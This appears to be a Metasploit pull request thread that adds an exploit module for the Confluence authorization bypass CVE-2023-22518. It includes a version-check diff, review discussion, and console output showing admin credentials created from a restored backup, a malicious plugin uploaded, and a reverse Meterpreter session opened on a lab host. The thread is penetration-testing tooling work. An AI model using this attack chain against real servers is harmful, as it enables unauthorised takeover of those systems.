### PR TITLE
CVE-2023-22518: Confluence Auth Bypass Restore From Backup RCE

### LINKED ISSUE #18543: Atlassian Confluence CVE-2023-22518
## Summary

This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a Confluence instance administrator account. Using this account, an attacker can then perform all administrative actions that are available to Confluence instance administrator leading to file upload and ultimate pwnage. 

### Basic example

https://github.com/0x0d3ad/CVE-2023-22518/blob/main/exploit.py

### Motivation

To bring great joy to the framework by the addition of this module.

### PR DESCRIPTION
**Pull request by jheysel-r7**
This PR adds a module for CVE-2023-22518, an Improper Authorization vulnerability in Confluence which allows an attacker to upload and restore a .zip backup file to the server containing a known user name and password. The attacker can then login with the credentials from the backup file to gain administrative access to the server. 

The PR also includes a PluginPayload mixin which makes it easy to upload a metasploit .jsp payload to the server as a Confluence Plugin. The mixin work was primarily written by Stephen Fewer in his CVE-2023-22515 module and was refactored as a part of this PR.

### CODE REVIEW

**Review by cdelafuente-r7 — COMMENTED** [review]
Thanks @jheysel-r7 for this great module! I just left a few minor comments. I also tested against Confluence version 8.5.1 and it works great!

File: modules/exploits/multi/http/atlassian_confluence_unauth_backup.rb [hunk 1]
```diff
@@ -0,0 +1,154 @@
...
+  end
+
+  def check
+    confluence_version = get_confluence_version
+
+    # Confluence Serer and Confluence Data Center have the same vulnerable version ranges.
+    if confluence_version.between?(Rex::Version.new('1.0.0'), Rex::Version.new('7.19.15')) ||
+       confluence_version.between?(Rex::Version.new('7.20.0'), Rex::Version.new('8.3.3')) ||
+       confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.3')) ||
+       confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.2'))
```
[the remark this answers is not in the document]
Comment (jheysel-r7) [reply modules/exploits/multi/http/atlassian_confluence_unauth_backup.rb]: Good catch! The only affected version in `8.6.x` seems to be `8.6.0` so I'll just add an explicit check for that version.

[the remark this answers is not in the document]
Comment (jheysel-r7) [reply modules/exploits/multi/http/atlassian_confluence_unauth_backup.rb]: Good catch! The only affected version in `8.6.x` seems to be `8.6.0` so I'll just add an explicit check for that version.

File: lib/msf/core/exploit/remote/http/atlassian.rb
[the remark this answers is not in the document]
Comment (jheysel-r7) [reply lib/msf/core/exploit/remote/http/atlassian.rb:1]: I believe these two files are required by the mixin structure, although please correct me if I'm wrong. Deleting `atlassian.rb` and `confluence.rb` but keeping `.../atlassian/confluence/version.rb` results in:
```
msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > reload_lib --all
[-] /Users/jheysel/rapid7/metasploit-framework/lib/msf/core/exploit/remote/http/atlassian.rb must exist and be a .rb file
[-] /Users/jheysel/rapid7/metasploit-framework/lib/msf/core/exploit/remote/http/atlassian/confluence.rb must exist and be a .rb file
```

**Review by jheysel-r7 — COMMENTED** [review]
Thanks for the review @cdelafuente-r7!! I've pushed a couple changes.

**Comment by cdelafuente-r7** [comment]
Thanks for updating this @jheysel-r7. Apparently, `reload_lib --all` reload ruby files that have been changed using `git`. Since both `lib/msf/core/exploit/remote/http/atlassian.rb` and `lib/msf/core/exploit/remote/http/atlassian/confluence.rb` have changed (removed), the command will reload them. So, if you commit the changes, you should not have these errors anymore.

I've tested without these files and the module seems to run fine.

**Comment by jheysel-r7** [comment]
You learn something new everyday :) Thanks for your patience and taking the time to explain that @cdelafuente-r7! I've removed those two files in [5d5ccd2](https://github.com/rapid7/metasploit-framework/pull/18566/commits/5d5ccd25e1836747572284cfed2c72c2e33650b4)

**Comment by cdelafuente-r7** [comment]
Thanks for updating this @jheysel-r7 ! Everything looks good to me now. I tested against Confluence version 8.5.1 and verified I got a session. I'll go ahead and land it.


- Example output
```
msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > run verbose=true rhosts=192.168.100.102

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable version of Confluence: 8.5.1
[*] Setting credentials: buffy:NfnTOsVd
[+] Exploit Success! Login Using 'buffy :: NfnTOsVd'
[*] Generating payload plugin
[*] Uploading payload plugin
[*] Sleeping for 2 seconds before attempting again
[*] Triggering payload plugin
[*] Deleting plugin...
[*] Sending stage (57692 bytes) to 192.168.100.1
[*] Meterpreter session 1 opened (192.168.100.1:4444 -> 192.168.100.1:53324) at 2023-12-18 18:41:39 +0100

meterpreter > getuid
Server username: WIN2019$
meterpreter > sysinfo
Computer        : WIN2019
OS              : Windows Server 2019 10.0 (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/windows
```

**Comment by cdelafuente-r7** [comment]
# Relese notes

This adds an exploit module for CVE-2023-22518, an Improper Authorization vulnerability in Confluence which allows an attacker to upload and restore a .zip backup file to the server containing a known user name and password. The attacker can then login with the credentials from the backup file to gain administrative access to the server.

**Pull request merged**